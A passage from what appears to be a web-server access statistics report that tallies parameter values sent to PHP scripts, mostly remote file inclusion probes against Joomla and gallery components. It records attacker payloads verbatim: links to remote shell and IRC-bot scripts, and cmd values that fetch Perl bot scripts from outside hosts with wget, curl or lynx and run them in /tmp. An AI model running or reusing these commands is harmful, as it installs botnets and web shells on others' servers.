http://usuarios.arnet.com.ar/adrikrasnow/test.txt? 40
Parameter ff_compathftp://77.91.227.68/upload/tmp/1422423437/242242343
10/oldbisok??
ValueAccesses
2
Parameter mosConfig_absolute_path
ValueAccesses
http://test.iearn.uz/test.iearn.uz/help.txt??? 6
http://www.geocities.com/p4n93r4nk0d0k/kodok.txt?http://lunk
.110mb.com/all.txt?
3
http://yudz-yudz.110mb.com/safe.txt? 2
http://www.infuse.be/v2//cache/id.txt?? 2
http://12.30.229.109/images/.../di?? 2
http://xucx.co.cc/gen/mix.txt??? 1
http://www.gumgangfarm.com/shop/data/id.txt? 1
http://carnet.sakura.ne.jp/cscart_dir/skins/echo3? 1
http://www.gumgangfarm.com/shop/data/id.txt?? 1
http://masprast.700megs.com/bot/cmd.txt??? 1
OTHER: 4,931
ScriptTotal Accesses
/wusage/summary/cgi.html/administrator/components/com_compro
filer/plugin.class.php
5,770
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 6
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
4
uname -a; idhttp://www.webzenxd.kit.net/tool25.txt? 2
cd /tmp;rm botnet.txt;wget http://www.probiotec.com.br/uploa
ds/botnet.txt;fetch http://www.probiotec.com.br/uploads/botn
et.txt;lwp-download hhttp://www.probiotec.com.br/uploads/bot
net.txt;curl -O http://www.probiotec.com.br/uploads/botnet.t
xt;lynx http://www.probiotec.com.br/uploads/botnet.txt;perl
botnet.txt;rm botnet.txt
2
cd /tmp;rm -rf *;cd /tmp;lwp-download http://triangle-uiuc.o
rg/attack/zero.txt;fetch http://triangle-uiuc.org/attack/zer
o.txt;curl -o zero.txt http://triangle-uiuc.org/attack/zero.
txt;wget http://triangle-uiuc.org/attack/zero.txt;perl zero.
txt?
1
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
1
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip
1
Parameter http://Gabson.fileave.com/script9.txt??
ValueAccesses
26
Parameter http://Gabson.fileave.com/script9.txt??http://Gabson.fileave
.com/script9.txt??
ValueAccesses
1
Parameter http://Irc.fileave.com/Script9.txt??
ValueAccesses
4
Parameter http://datacenterfla.com/dpf/teste.txt?
ValueAccesses
1
Parameter http://irc.fileave.com/script9.txt?
ValueAccesses
1
Parameter http://lol1234.fileave.com/script9.txt??
ValueAccesses
89
Parameter http://lol1234.fileave.com/script9.txt??http://lol1234.filea
ve.com/script9.txt??
ValueAccesses
4
Parameter http://lol1234.fileave.com/script9.txt??http://lol1234.filea
ve.com/script9.txt??http://lol1234.fileave.com/script9.txt??
http://lol1234.fileave.com/script9.txt??
ValueAccesses
2
Parameter http://tibiasupport.fileave.com/script8.txt??
ValueAccesses
19
OTHER: 5,606
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_rsgallery/rsgallery.
html.php
5,630
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm bot.txt;wget http://www.ay2dayz-download.com/bot.
txt;fetch http://www.ay2dayz-download.com/bot.txt;lwp-downlo
ad http://www.ay2dayz-download.com/bot.txt;curl -O http://ww
w.ay2dayz-download.com/bot.txt;lynx http://www.ay2dayz-downl
oad.com/bot.txt;perl bot.txt
123
cd /tmp;rm bot1.txt;wget http://chrystylcoiffure.com/bot1.tx
t;fetch http://chrystylcoiffure.com/bot1.txt;lwp-download ht
tp://chrystylcoiffure.com/bot1.txt;curl -O http://chrystylco
iffure.com/bot1.txt;lynx http://chrystylcoiffure.com/bot1.tx
t;perl bot1.txt
69
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
35
uname -a; id 20
cd /tmp;rm bot1.txt;wget http://loveyou-love.t35.com/bot1.tx
t;fetch http://loveyou-love.t35.com/bot1.txt;lwp-download ht
tp://loveyou-love.t35.com/bot1.txt;curl -O http://loveyou-lo
ve.t35.com/bot1.txt;lynx http://loveyou-love.t35.com/bot1.tx
t;perl bot1.txt
15
cd /tmp;rm bot.txt;wget http://www.ay2dayz-download.com/bot.
txt;fetch http://www.ay2dayz-download.com/bot.txt;lwp-downlo
ad http://www.ay2dayz-download.com/bot.txt;curl -O http://ww
w.ay2dayz-download.com/bot.txt;lynx http://www.ay2dayz-downl
oad.com/bot.txt;perl bot.txthttp://www.ay2dayz-download.com/
tool25.txt?
7
id 5
cd /tmp;rm bot1.txt;wget http://yugifire43.t35.com/bot1.txt;
fetch http://yugifire43.t35.com/bot1.txt;lwp-download http:/
/yugifire43.t35.com/bot1.txt;curl -O http://yugifire43.t35.c
om/bot1.txt;lynx http://yugifire43.t35.com/bot1.txt;perl bot
1.txt
5
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;wget http://189.14.98
.102/ip1.txt;wget http://189.14.98.102/ros1.txt;wget http://
189.14.98.102/scanasc.txt;curl -o new.txt http://189.14.98.1
02/new.txt;curl -o ip1.txt http://189.14.98.102/ip1.txt;curl
-o ros1.txt http://189.14.98.102/ros1.txt;curl -o scanasc.t
xt http://189.14.98.102/scanasc.txt;perl new.txt;perl ip1.tx
t;perl ros1.txt;perl scanasc.txt
4
cd /tmp;rm bot1.txt;wget http://yugifire41.275mb.com/bot1.tx
t;fetch http://yugifire41.275mb.com/bot1.txt;lwp-download ht
tp://yugifire41.275mb.com/bot1.txt;curl -O http://yugifire41
.275mb.com/bot1.txt;lynx http://yugifire41.275mb.com/bot1.tx
t;perl bot1.txt
4
Parameter cmd??
ValueAccesses
1
Parameter ip
ValueAccesses
87.17.167.239 1
Parameter mosConfig_absolute_page
ValueAccesses
http://yoga0400.org/rox.txt?? 1
Parameter mosConfig_absolute_path
ValueAccesses
http://www.mosaictoronto.org/help/indexs.php? 449
http://mosaictoronto.org/help/indexs.php? 216
http://www.ay2dayz-download.com/tool25.txt? 122
http://xxxds.110mb.com/conf.txt???? 119
http://qlzr.host.sk/line.gif? 96
http://chrystylcoiffure.com/tool25.txt? 69
http://usuarios.arnet.com.ar/larry123/safe.txt? 55
? 54
http://www.superlab.jazztel.es/safe.gif? 43
http://usuarios.arnet.com.ar/adrikrasnow/test.txt? 43
Parameter mosConfig_absolute_pathhttp://echolon.mobi/s.txt?
ValueAccesses
1
Parameter mosConfig_absolute_pathhttp://www.cyos.co.kr/bbs/data1/file?
?
ValueAccesses
1
Parameter mosConfig_absolute_pathhttp://www.cyos.co.kr/bbs/data1/note?
?
ValueAccesses
3
OTHER: 4,069
ScriptTotal Accesses
/wusage2/summary/cgi.html//modules/xoopsgallery/upgrade_albu
m.php
5,331
Parameters by Submitted Value
Parameter
ValueAccesses
http://www.mynewsassistant.com/sendstudio/archive/160/267/at
tachments/.prv8???
2
Parameter GALLERY_BASEDIR
ValueAccesses
http://mosaictoronto.org/help/indexs.php? 316
http://x2k3.w.interia.pl/office.txt? 133
http://www.shakershoppe.com/_files/x.txt?? 131
http://www.autogas-dortmund.de/index.txt? 119
http://xxxds.110mb.com/conf.txt???? 112
http://lamahhh.w.interia.pl/own.txt? 110
http://www.xsenhalol.xpg.com.br/ylaslas?\r 82
http://lamahhh.w.interia.pl/ircbot.txt? 76
http://www.xdxisde.xpg.com.br/lgr.txt?] 59
http://lamahhh.w.interia.pl/own.txthttp://lamahhh.w.interia.
pl/own.txt?
50
Parameter GALLERY_BASEDIRftp://24.227.40.218/temp/trem/1?
ValueAccesses
1
Parameter GALLERY_BASEDIRftp://24.227.40.218/temp/trem/oldbisok?
ValueAccesses
1
Parameter GALLERY_BASEDIRftp://24.227.40.218/temp/trem/oldbisok??
ValueAccesses
2
Parameter GALLERY_BASEDIRhttp://if.u.patch.shell.u.are.gay/smile.jpg??
ValueAccesses
http://www.congadas.com.br/hehe.txt? 5
http://www.lojavirtualoboticiario.com.br/tester.txt? 5
http://www.promocaoiphone3g.com/hehe.txt? 5
http://www.congadas.com.br/tester.txt? 2
Parameter GALLERY_BASEDIRhttp://www.u.are.gay.if.u.patch.shell.org/r57
.txt??
ValueAccesses
http://www.congadas.com.br/hehe.txt? 6
http://www.lojavirtualoboticiario.com.br/tester.txt? 6
http://www.promocaoiphone3g.com/hehe.txt? 5
http://www.congadas.com.br/tester.txt? 2
Parameter GALLERY_BASEhttp://russianinterpreter.ru/administrator/templ
ates/joomla????
ValueAccesses
1
Parameter cmd
ValueAccesses
2
uname -a; id 345
uname -a; id 14
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
7
cd /tmp;rm -rf rfi*;wget http://h1.ripway.com/skyn/rfi.txt;l
wp-download http://h1.ripway.com/skyn/rfi.txt;fetch http://h
1.ripway.com/skyn/rfi.txt;curl -o rfi.txt http://h1.ripway.c
om/skyn/rfi.txt;GET http://h1.ripway.com/skyn/rfi.txt >rfi.t
xt;lynx -source http://h1.ripway.com/skyn/rfi.txt >rfi.txt;p
erl rfi.txt;rm -rf rfi.txt*
6
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;wget http://189.14.98
.102/ip1.txt;wget http://189.14.98.102/ros1.txt;wget http://
189.14.98.102/scanasc.txt;curl -o new.txt http://189.14.98.1
02/new.txt;curl -o ip1.txt http://189.14.98.102/ip1.txt;curl
-o ros1.txt http://189.14.98.102/ros1.txt;curl -o scanasc.t
xt http://189.14.98.102/scanasc.txt;perl new.txt;perl ip1.tx
t;perl ros1.txt;perl scanasc.txt
4
id 4
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
4
cd /tmp;wget http://x90x80.altervista.org/jon.txt;mv jon.txt
.1.php;php .1.php
3
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
3
Parameter cmdhttp://www.tripiwarez.eu/script/spr2.txt?
ValueAccesses
1
OTHER: 3,707
ScriptTotal Accesses
/wusage2/summary/cgi.html/components/com_phpshop/toolbar.php
shop.html.php
5,079
Parameters by Submitted Value
Parameter C99?
ValueAccesses
1
Parameter bot
ValueAccesses
1 1
Parameter cmd
ValueAccesses
id 9
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
6
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
w.powerbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.t
xt
5
cd /tmp;rm botnet.txt;wget http://noden.110mb.com/botnet.txt
;fetch http://noden.110mb.com/botnet.txt;lwp-download http:/
/noden.110mb.com/botnet.txt;curl -O http://noden.110mb.com/b
otnet.txt;lynx http://noden.110mb.com/botnet.txt;perl botnet
.txt;rm botnet.txt
5
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;rm spr
iter1.txt;wget http://www.kcdesi.com/spriter1.txt;curl -o sp
riter1.txt http://www.kcdesi.com/spriter1.txt;perl spriter1.
txt
4
uname -a; id 4
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://www.anje.pt/ip1.txt;wget http://www.anje.pt/ros1.txt;w
get http://www.anje.pt/scanasc.txt;curl -o ip1.txt http://ww
w.anje.pt/ip1.txt;curl -o ros1.txt http://www.anje.pt/ros1.t
xt;curl -o scanasc.txt http://www.anje.pt/scanasc.txt;perl i
p1.txt;perl ros1.txt;perl scanasc.txt
4
cd /tmp;rm botnet.txt;wget http://www.powerbikes.gr/forum/bo
tnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt;lwp
-download http://www.powerbikes.gr/forum/botnet.txt;curl -O
http://www.powerbikes.gr/forum/botnet.txt;lynx http://www.po
werbikes.gr/forum/botnet.txt;perl botnet.txt;rm botnet.txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip
2
cd /tmp;GET http://sharz0r.we.bs/prendedor.txt > prendedor.t
x;perl prendedor.tx abcase
2
Parameter mosConfig_absolute_path
ValueAccesses
http://www.mosaictoronto.org/help/indexs.php? 441
http://radio.cp-geek.com/c.txt?\r 101
http://xxxds.110mb.com/conf.txt???? 100
http://www.buyindianproducts.com/includes/font/c.txt?\r 98
ftp://84.32.137.157/incoming/upload/trem/oldbisok?? 75
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
74
http://www.elipoulin.com/cache/c.txt?\r 72
http://lamahhh.w.interia.pl/ircbot.txt? 58
http://mosaictoronto.org/help/indexs.php? 47
http://www.? 46
Parameter mosConfig_absolute_pathhttp://63.247.81.138/~ucrol/byemyst.t
xt???
ValueAccesses
1
Parameter mosConfig_absolute_pathhttp://63.247.81.138/~ucrol/maya.txt?
??
ValueAccesses
2
Parameter mosConfig_absolute_pathhttp://63.247.81.138/~ucrol/maya.txt?
????????????????????????
ValueAccesses
1
Parameter mosConfig_absolute_pathhttp://63.247.81.138/~ucrol/maya1.txt
??
ValueAccesses
3
Parameter mosConfig_absolute_pathhttp://63.247.81.138/~ucrol/maya1.txt
??????????
ValueAccesses
1
Parameter mosConfig_absolute_pathhttp://www.mu.ac.th/portal/components
/com_extcalendar/bigdoz.txt?
ValueAccesses
1
OTHER: 3,912
ScriptTotal Accesses
/errors.php 4,766
Parameters by Submitted Value
Parameter
ValueAccesses
http://russianinterpreter.ru/images/stories/idd.txt?? 2
Parameter PNphpBB2
ValueAccesses
http://www.keynet.com.pl/upload/zestawy/wy.txt??? 1
Parameter REX[INCLUDE_PATH]
ValueAccesses
http://www.fox28.de/mambots/editors/botid.txt? 4
Parameter baseDir
ValueAccesses
http://www.sharenotesstore.com/can? 1
Parameter cmd?
ValueAccesses
2
Parameter dir
ValueAccesses
uid=48(apache) gid=48(apache) groups=48(apache) ? 7
http://www.seaofgreenclan.com/idd.txt? ?? 3
http://natsweddings.com/editor/idd.txt??? 3
http://neu_2.lasrv-1.de/web/.v6/id.txt???? 1
http://russianinterpreter.ru/images/stories/idd.txt?? 1
http://russianinterpreter.ru/images/stories/idd.txt??? 1
http://pikappaalpha.net/images/idd.txt??? 1
Parameter error
ValueAccesses
http://alieandrann.net/id.txt??? 1
Parameter error http://www.geocities.com/elmaningrum/test.txt???
ValueAccesses
1
Parameter error
ValueAccesses
http://cr4nk.wrz.be/cr4nk/i? 183
http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? 176
http://1285-2.1st-housing.de/skins/sys_cr4nk/i? 121
http://www.flagstaffsaloon.be/home/i? 107
http://www.fm24forum.de/update/fissh/sys_cr4nk/i? 102
http://www.mazcotaz.com/help/cmd.txt? 99
http://hotel682.server4you.de/skins/mskin_1/sys_cr4nk/i? 86
http://www.amigurumiland.com/mc-root/idnews.txt? 82
http://n31.dual-srv.de/kunde/sys_cr4nk/i? 78
http://www.exceldozai.com//mambots/system/idnews.txt? 71
Parameter errorhttp://members.lycos.co.uk/dudi42/wtf.txt???
ValueAccesses
2
OTHER: 3,630
ScriptTotal Accesses
/wusage2/summary/cgi.html//ashnews.php 4,753
Parameters by Submitted Value
Parameter
ValueAccesses
http://www.evilc0der.com/r57.txt?? 1
http://nmb-sqaud.xm.com/NMB.SQUAD.txt?? 1
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
35
cd /tmp;GET http://www.sprula.kit.net/bruxom4l.txt > bruxom4
l.txt;perl bruxom4l.txt abcase
9
cd /tmp;GET http://sprula.kit.net/bot.txt > bot.txt;perl bot
.txt;rm bot.txt
8
id 5
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;wget http://189.14.98
.102/ip1.txt;wget http://189.14.98.102/ros1.txt;wget http://
189.14.98.102/scanasc.txt;curl -o new.txt http://189.14.98.1
02/new.txt;curl -o ip1.txt http://189.14.98.102/ip1.txt;curl
-o ros1.txt http://189.14.98.102/ros1.txt;curl -o scanasc.t
xt http://189.14.98.102/scanasc.txt;perl new.txt;perl ip1.tx
t;perl ros1.txt;perl scanasc.txt
4
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;rm spr
iter1.txt;wget http://www.kcdesi.com/spriter1.txt;curl -o sp
riter1.txt http://www.kcdesi.com/spriter1.txt;perl spriter1.
txt
3
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip
2
cd /tmp;wget http://www.htinfo.net/help.txt ; perl help.txt
; rm help.txt
1
cd /tmp;wget http://needforthings.com/click4tshirts/oneadmin
/eccatalog/wce.read.txt;perl wce.read.txt;rm -rf wce.read.tx
t
1
cd /tmp;curl -o help.txt http://www.htinfo.net/help.txt > he
lp.txt; perl help.txt ; rm help.txt
1
Parameter pathtoashnews
ValueAccesses
http://www.xsenhalol.xpg.com.br/ylaslas?\r 228
http://mosaictoronto.org/help/indexs.php? 197
http://www.mosaictoronto.org/help/indexs.php? 167
http://xxxds.110mb.com/conf.txt???? 122
http://usuarios.lycos.es/janx/co.txt?? 58
http://www.buyindianproducts.com/includes/font/c.txt?\r 56
http://radio.cp-geek.com/c.txt?\r 55
http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? 53
http://raptortx.freetzi.com/rapz.txt?? 50
http://www.elipoulin.com/cache/c.txt?\r 47
Parameter pathtoashnewshttp://naira-boy.xm.com/NMB.SQUAD.txt??
ValueAccesses
1
OTHER: 3,648
ScriptTotal Accesses
/wusage2/summary/cgi.html//skin/zero_vote/ask_password.php 4,721
Parameters by Submitted Value
Parameter
ValueAccesses
2
Parameter ?dir
ValueAccesses
http://60z.org/wut.txt? 14
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
33
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;wget http://189.14.98
.102/ip1.txt;wget http://189.14.98.102/ros1.txt;wget http://
189.14.98.102/scanasc.txt;curl -o new.txt http://189.14.98.1
02/new.txt;curl -o ip1.txt http://189.14.98.102/ip1.txt;curl
-o ros1.txt http://189.14.98.102/ros1.txt;curl -o scanasc.t
xt http://189.14.98.102/scanasc.txt;perl new.txt;perl ip1.tx
t;perl ros1.txt;perl scanasc.txt
6
id 5
cd /tmp;GET http://www.brx.kit.net/bruxom4l.txt > bruxom4l.t
xt;perl bruxom4l.txt abcase
4
id? 2
uhttp://usuarios.arnet.com.ar/adrikrasnow/jo.txt?name -a; id
2
dir 1
cd /tmp;GET http://www.brx.kit.net/bruxOm4l.txt > bruxOm4l.t
xt;perl bruxOm4l.txt abcase
1
Parameter dir
ValueAccesses
http://www.xsenhalol.xpg.com.br/ylaslas?\r 136
http://pwcomm.iquebec.com/ehz.txt? 89
http://hamapallen.us/fadalinux.txt? 64
http://www.19yo.de/images/stories/fruit/wy.txt?? 48
http://tibiasupport.fileave.com/script9.txt?? 42
http://www.gasthof-neumeister.com/images/zoom/special.txt???
?
41
http://www.informaretreinamento.com.br/old_stats/old/php5/ra
pidget/users/x.txt???
39
38
http://www.concurs.org/tst.txt?? 34
http://www.r57shell.in/r57.txt?????? 32
Parameter error
ValueAccesses
http://russianinterpreter.ru/images/stories/idd.txt?? 1
http://www.arisukoyu.org.tr/forum/Smileys/v6id.txt? 1
http://www.globalcare.or.kr/donor/tst.txt??? 1
Parameter s
ValueAccesses
r 2
OTHER: 4,083
ScriptTotal Accesses
/wusage2/summary/cgi.html/components/com_rsgallery/rsgallery
.html.php
4,634
Parameters by Submitted Value
Parameter C99?
ValueAccesses
5
Parameter cmd
ValueAccesses
killall -9 perl;rm ip1.txt;rm ros1.txt;rm scanasc.txt;wget h
ttp://201.70.9.109/ip1.txt;wget http://201.70.9.109/ros1.txt
;wget http://201.70.9.109/scanasc.txt;curl -o ip1.txt http:/
/201.70.9.109/ip1.txt;curl -o ros1.txt http://201.70.9.109/r
os1.txt;curl -o scanasc.txt http://201.70.9.109/scanasc.txt;
perl ip1.txt;perl ros1.txt;perl scanasc.txt
40
uname -a; id 10
killall -9 perl;rm new.txt;rm ip1.txt;rm ros1.txt;rm scanasc
.txt;wget http://189.14.98.102/new.txt;w